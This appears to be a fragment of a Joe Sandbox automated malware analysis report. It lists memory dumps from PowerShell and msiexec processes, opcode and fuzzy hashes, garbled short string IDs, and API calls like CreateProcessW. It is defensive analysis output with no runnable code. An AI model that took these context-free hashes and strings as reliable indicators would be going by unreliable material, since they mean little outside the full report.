                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ecce41728f1729988c05fb4e2a1d38c4e33c310a24bc8f1613530cecb0050045
                                                                                                    • Instruction ID: c4c62d5a5821fbe9edc55f9ad0bc0f3d741866c44d2bf6ec56e3bfd5089e45d9
                                                                                                    • Opcode Fuzzy Hash: ecce41728f1729988c05fb4e2a1d38c4e33c310a24bc8f1613530cecb0050045
                                                                                                    • Instruction Fuzzy Hash: 03D01734E042088F8744EFA4E44A96EBBB6EB45201F0081A9EA0A93781EA30A9018BD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 97383e34ea34f45efa1ecc3c07809c73ceb352f297c57a45d0dd03379463b336
                                                                                                    • Instruction ID: 05da92f3343f61e4cefdf4a33314fd36270fe4591b82b370b3124687cbb1bd24
                                                                                                    • Opcode Fuzzy Hash: 97383e34ea34f45efa1ecc3c07809c73ceb352f297c57a45d0dd03379463b336
                                                                                                    • Instruction Fuzzy Hash: D0D01731C0410E8BCB09AFA4E86E4BDBB74FB10205F8040ADD94752581AE20691ACFD4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4afe25095ee8850a345056a25f50cec9a0b567717db86071930852195f2635dc
                                                                                                    • Instruction ID: c4bfa0644424d9217533ff7c4f5de1e6b96a5955591e9dedfe25277ff7654603
                                                                                                    • Opcode Fuzzy Hash: 4afe25095ee8850a345056a25f50cec9a0b567717db86071930852195f2635dc
                                                                                                    • Instruction Fuzzy Hash: 0EA011302000008BC280CA00C8A2800B320EBC2208B28C8AAA8088F28ACB23EA03CA00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq$84rl$84rl$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-1816874766
                                                                                                    • Opcode ID: 3f21e24b377feebba785bfefdb05bfe43f004804cfb7b6a08c6b7e56d8b6bc19
                                                                                                    • Instruction ID: 49817a26f144e86bf32c8b25f2fd70b654009e05586c8b7d04c57f8152a9e1fd
                                                                                                    • Opcode Fuzzy Hash: 3f21e24b377feebba785bfefdb05bfe43f004804cfb7b6a08c6b7e56d8b6bc19
                                                                                                    • Instruction Fuzzy Hash: BCC13AB1705216DFDB248F78C9486BABBE6EFC5714F1480AAD805DB291CB35CD81CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$84rl$tPjq$tPjq$$jq$(pq$(pq$(pq
                                                                                                    • API String ID: 0-3106456213
                                                                                                    • Opcode ID: 88e1e5c6b9df8b90ef2b1a6a25ce6afcbf1bceadf00b17afbc783e8d87a29ab8
                                                                                                    • Instruction ID: a7b3525736ca82cb0d69638dca01b07449d0420860654d99c82471c9e4e5727d
                                                                                                    • Opcode Fuzzy Hash: 88e1e5c6b9df8b90ef2b1a6a25ce6afcbf1bceadf00b17afbc783e8d87a29ab8
                                                                                                    • Instruction Fuzzy Hash: 6471F8F1A02246DFCF24CF58C548BBAB7E6BF85318F289495E8156B291C735ED80CB61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84rl$84rl$XRoq$XRoq$XRoq$tPjq$tPjq$$jq
                                                                                                    • API String ID: 0-27085299
                                                                                                    • Opcode ID: 355062af24dcc2a12daac5dbd883a3b3fdf86d314a4472cbd58add5e45da99c5
                                                                                                    • Instruction ID: 49a3af78399791346163fe7684a429657c53e2f81fb590c5766b1d93f9fce4d3
                                                                                                    • Opcode Fuzzy Hash: 355062af24dcc2a12daac5dbd883a3b3fdf86d314a4472cbd58add5e45da99c5
                                                                                                    • Instruction Fuzzy Hash: 806167B1F01202DFCB149F68C548AAABBF6EF89315F24C46AE4158F295CB35CD81C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$84rl$84rl$tPjq$tPjq$$jq$$jq
                                                                                                    • API String ID: 0-3773633723
                                                                                                    • Opcode ID: 76436273a2367c38c958efb12567e58251b96a73d41d8ab5fa4654204e5ff4db
                                                                                                    • Instruction ID: 096f8ec0805a566ca9b5b28265d8759de11a24b73fcfe634d0ef9307977d1dde
                                                                                                    • Opcode Fuzzy Hash: 76436273a2367c38c958efb12567e58251b96a73d41d8ab5fa4654204e5ff4db
                                                                                                    • Instruction Fuzzy Hash: E561D4B1F4121ADFCB14CF58D908AAABBA6FF89314F248455ED015B395CB31DC91CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-2044242850
                                                                                                    • Opcode ID: 76d5a9c443c461e807107468d28bb046727b29374e965a5113f168cf70c2e603
                                                                                                    • Instruction ID: d7dc97392820f2a9a926a3a42aaeb21ecb11cb569923c4d9c8c6f02b551d2960
                                                                                                    • Opcode Fuzzy Hash: 76d5a9c443c461e807107468d28bb046727b29374e965a5113f168cf70c2e603
                                                                                                    • Instruction Fuzzy Hash: 3951B3F0A0224ADFDB24CE04C64C7B677B2BF4531AF18A466E8059B290D775DDC1CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq$jl$jl
                                                                                                    • API String ID: 0-2060193051
                                                                                                    • Opcode ID: 5d05f941ff2e147c0999cfec36d3fecb4cfbb2b9c7ef1b1bde1a05d1de31aaed
                                                                                                    • Instruction ID: a3fc44782b7da71c95c87183a7b04dbf406d05950f0445f0d1e944550eac6d5a
                                                                                                    • Opcode Fuzzy Hash: 5d05f941ff2e147c0999cfec36d3fecb4cfbb2b9c7ef1b1bde1a05d1de31aaed
                                                                                                    • Instruction Fuzzy Hash: 2A516DB1706316AFCB255E7AC8183A7BFB6EFC2214F14807BD445CB251DA32C995C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$d%pq$d%pq$d%pq$tPjq$$jq
                                                                                                    • API String ID: 0-1234104484
                                                                                                    • Opcode ID: 7efa864d5237b2ef14c5c979379a67c718fcf1a977cd20f7f1c25b805284559d
                                                                                                    • Instruction ID: c080186f5b84828ba9f22127c42bb213cac96eb4fc21cfc9df522948d9242a77
                                                                                                    • Opcode Fuzzy Hash: 7efa864d5237b2ef14c5c979379a67c718fcf1a977cd20f7f1c25b805284559d
                                                                                                    • Instruction Fuzzy Hash: C451F5F1A12216DFDB24CE14C548BBAB7E2EF84758F189099E811AF390C735DD81CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-3254272252
                                                                                                    • Opcode ID: a734ef96f9cbd3740f35e127aa7228fdf901aa32e5fd6c90d7cb8955b7f36805
                                                                                                    • Instruction ID: 1f17c3786b16add107c8985cd5f396b25bb81f3fbb13d847de93a15cb7fbae9a
                                                                                                    • Opcode Fuzzy Hash: a734ef96f9cbd3740f35e127aa7228fdf901aa32e5fd6c90d7cb8955b7f36805
                                                                                                    • Instruction Fuzzy Hash: 881239B0A402199FDB24DF14CD90BEABBB2FB45304F1085E4D9096B795CB72AE85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-3356825164
                                                                                                    • Opcode ID: bf2e9c111d97e924495cab53aca2f8ed97f1c49adf2d63eca2122786af225498
                                                                                                    • Instruction ID: 7ce798b914902ac561794ac07da69abc0b8231009325f9c616b8eba54c089337
                                                                                                    • Opcode Fuzzy Hash: bf2e9c111d97e924495cab53aca2f8ed97f1c49adf2d63eca2122786af225498
                                                                                                    • Instruction Fuzzy Hash: EC3157B27463038FDB254A6594981B6B7B6EFC2116B24D47FE8C28B281DE35C8C6C351
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$84rl$d%pq$d%pq$d%pq$tPjq
                                                                                                    • API String ID: 0-890069297
                                                                                                    • Opcode ID: 4eb2938de0b0edc15e33b487cc7e5d3263a9286e7625d4866daec7d1525e0a55
                                                                                                    • Instruction ID: 177c4e499dea4e0c8caf4363bfbeb87ab4b47b0a1202b98ce672cef12d20e9fe
                                                                                                    • Opcode Fuzzy Hash: 4eb2938de0b0edc15e33b487cc7e5d3263a9286e7625d4866daec7d1525e0a55
                                                                                                    • Instruction Fuzzy Hash: 5331A2B1B01215DFCB28DF54C948EAABBE2FF88714F259199E905AB350C731DD41CBA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84rl$84rl$tPjq$tPjq$$jq
                                                                                                    • API String ID: 0-1502646468
                                                                                                    • Opcode ID: 1217215e5f61215cd9bc0cdc4a219c8513d5391af60f97ea223b5f5f7d912ba9
                                                                                                    • Instruction ID: 66f8d58c0e980c2fc4daa5f1a0b8756e47bea299fc0369fe3eec56de4aebbafc
                                                                                                    • Opcode Fuzzy Hash: 1217215e5f61215cd9bc0cdc4a219c8513d5391af60f97ea223b5f5f7d912ba9
                                                                                                    • Instruction Fuzzy Hash: C0615AB1701205CFCB259B69C548AAABBF3EF85314F68C469E8159F395CB31DC81CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-103809679
                                                                                                    • Opcode ID: 23b2478cfa1a293477aad12e4fed85f8e163d82ec1359caf70dc1d2a18d77c1f
                                                                                                    • Instruction ID: 647513455f48b73e3fe092c83ec7a7dd5dc5ed0bb0d21d20a5b2e84d67bd66bf
                                                                                                    • Opcode Fuzzy Hash: 23b2478cfa1a293477aad12e4fed85f8e163d82ec1359caf70dc1d2a18d77c1f
                                                                                                    • Instruction Fuzzy Hash: 3F415BF1706206EFCF354A2489182BE7BA3EFC1311F14546AD8018B695DF36C981C7A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-103809679
                                                                                                    • Opcode ID: 614d484ad05eeea69f9b029cc7f670445958efc0cd05f6a9989c4245c1acdd22
                                                                                                    • Instruction ID: ff0ee717d86fbacdc2c19a4b15ffedb702e3ede93d71d2bfb993b75013efa3b5
                                                                                                    • Opcode Fuzzy Hash: 614d484ad05eeea69f9b029cc7f670445958efc0cd05f6a9989c4245c1acdd22
                                                                                                    • Instruction Fuzzy Hash: 2D4160B1702207DFCB254E698C485B6B7AEFFC2214B28947BDD918B191CB39C891C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                                    • API String ID: 0-4000621977
                                                                                                    • Opcode ID: 063f78ae3ec83a543696a471ef4f6b9fe7c2e8b67e129704608b491ff144e042
                                                                                                    • Instruction ID: b8d6410f1d6850b8c01efa3da03e945592f58de89a5ac3dd7ef8308dc7807df8
                                                                                                    • Opcode Fuzzy Hash: 063f78ae3ec83a543696a471ef4f6b9fe7c2e8b67e129704608b491ff144e042
                                                                                                    • Instruction Fuzzy Hash: 9CD149B1F0624ADFCB158F68C8186AABBA2BF85315F14D07BD805CB2A1DB31CD85C791
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:25
                                                                                                    Total number of Limit Nodes:3

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0327AB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0327AB51

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(00000000), ref: 0327AD08

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(00000000), ref: 0327AD08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3281259548.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_324d000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3281259548.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_324d000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000006.00000002.3281464249.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3270000_msiexec.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0